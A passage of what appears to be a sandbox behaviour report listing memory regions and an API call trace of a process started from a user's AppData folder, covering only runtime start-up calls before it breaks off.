= mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1620 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1621 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1622 start_va = 0x5b0000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1623 start_va = 0x1a0000 end_va = 0x1bdfff monitored = 0 entry_point = 0x1b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1624 start_va = 0x6a0000 end_va = 0x827fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 1625 start_va = 0x1a0000 end_va = 0x1bdfff monitored = 0 entry_point = 0x1b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1626 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1627 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1628 start_va = 0x830000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 1629 start_va = 0x9c0000 end_va = 0x1dbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 1630 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1631 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1632 start_va = 0x74440000 end_va = 0x744bffff monitored = 0 entry_point = 0x744537c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1633 start_va = 0x4c0000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1634 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1635 start_va = 0x5b0000 end_va = 0x68efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 1636 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1637 start_va = 0x743c0000 end_va = 0x743d2fff monitored = 0 entry_point = 0x743c1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1638 start_va = 0x1c0000 end_va = 0x1c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1639 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Thread: id = 91 os_tid = 0xf1c [0122.272] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xa7284c60, dwHighDateTime=0x1d808b0)) [0122.272] GetCurrentProcessId () returned 0xf18 [0122.272] GetCurrentThreadId () returned 0xf1c [0122.273] GetTickCount () returned 0x1709286 [0122.273] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=2430576054779) returned 1 [0122.290] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0122.290] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x5a0000 [0122.291] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0122.291] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0122.291] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0122.291] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0122.291] GetProcAddress (hModule=0x769b0000, lpProcName="FlsFree") returned 0x769c354f [0122.291] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0122.292] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0122.292] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0122.292] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0122.292] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0122.292] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0122.292] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0122.292] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0122.292] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0122.292] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0122.293] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0122.293] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0122.293] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0122.293] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0122.294] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0122.294] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0122.294] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x214) returned 0x5a07d0 [0122.295] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0122.295] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0122.295] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0122.295] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0122.295] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0122.295] GetCurrentThreadId () returned 0xf1c [0122.295] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0122.295] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x800) returned 0x5a09f0 [0122.296] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0122.296] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0122.296] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0122.296] SetHandleCount (uNumber=0x20) returned 0x20 [0122.296] GetCommandLineA () returned="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr " [0122.296] GetEnvironmentStringsW () returned 0x2aee70* [0122.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1413, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1413 [0122.296] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x585) returned 0x5a11f8 [0122.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1413, lpMultiByteStr=0x5a11f8, cbMultiByte=1413, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1413 [0122.296] FreeEnvironmentStringsW (penv=0x2aee70) returned 1 [0122.296] GetLastError () returned 0x0 [0122.296] SetLastError (dwErrCode=0x0) [0122.296] GetLastError () returned 0x0 [0122.297] SetLastError (dwErrCode=0x0) [0122.297] GetLastError () returned 0x0 [0122.297] SetLastError (dwErrCode=0x0) [0122.297] GetACP () returned 0x4e4 [0122.297] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x220) returned 0x5a1788 [0122.297] GetLastError () returned 0x0 [0122.297] SetLastError (dwErrCode=0x0) [0122.297] IsValidCodePage (CodePage=0x4e4) returned 1 [0122.297] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0122.297] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0122.297] GetLastError () returned 0x0 [0122.297] SetLastError (dwErrCode=0x0) [0122.297] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0122.297] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0122.297] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0122.297] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0122.297] GetLastError () returned 0x0 [0122.298] SetLastError (dwErrCode=0x0) [0122.298] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0122.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0122.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿἱ@Ā") returned 256 [0122.298] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿἱ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0122.298] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿἱ@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0122.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿô{\x07N\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0122.298] GetLastError () returned 0x0 [0122.298] SetLastError (dwErrCode=0x0) [0122.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0122.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿἱ@Ā") returned 256 [0122.298] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿἱ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0122.298] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿἱ@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0122.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿô{\x07N\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0122.299] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a588, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0x2a [0122.299] GetLastError () returned 0x0 [0122.299] SetLastError (dwErrCode=0x0) [0122.299] GetLastError () returned 0x0 [0122.299] SetLastError (dwErrCode=0x0) [0122.299] GetLastError () returned 0x0 [0122.299] SetLastError (dwErrCode=0x0) [0122.299] GetLastError () returned 0x0 [0122.299] SetLastError (dwErrCode=0x0) [0122.299] GetLastError () returned 0x0 [0122.299] SetLastError (dwErrCode=0x0) [0122.299] GetLastError () returned 0x0 [0122.299] SetLastError (dwErrCode=0x0) [0122.299] GetLastError () returned 0x0 [0122.299] SetLastError (dwErrCode=0x0) [0122.299] GetLastError () returned 0x0 [0122.300] SetLastError (dwErrCode=0x0) [0122.300] GetLastError () returned 0x0 [0122.300] SetLastError (dwErrCode=0x0) [0122.300] GetLastError () returned 0x0 [0122.300] SetLastError (dwErrCode=0x0) [0122.300] GetLastError () returned 0x0 [0122.300] SetLastError (dwErrCode=0x0) [0122.300] GetLastError () returned 0x0 [0122.300] SetLastError (dwErrCode=0x0) [0122.300] GetLastError () returned 0x0 [0122.300] SetLastError (dwErrCode=0x0) [0122.300] GetLastError () returned 0x0 [0122.300] SetLastError (dwErrCode=0x0) [0122.300] GetLastError () returned 0x0 [0122.301] SetLastError (dwErrCode=0x0) [0122.301] GetLastError () returned 0x0 [0122.301] SetLastError (dwErrCode=0x0) [0122.301] GetLastError () returned 0x0 [0122.301] SetLastError (dwErrCode=0x0) [0122.301] GetLastError () returned 0x0 [0122.301] SetLastError (dwErrCode=0x0) [0122.301] GetLastError () returned 0x0 [0122.301] SetLastError (dwErrCode=0x0) [0122.301] GetLastError () returned 0x0 [0122.301] SetLastError (dwErrCode=0x0) [0122.301] GetLastError () returned 0x0 [0122.301] SetLastError 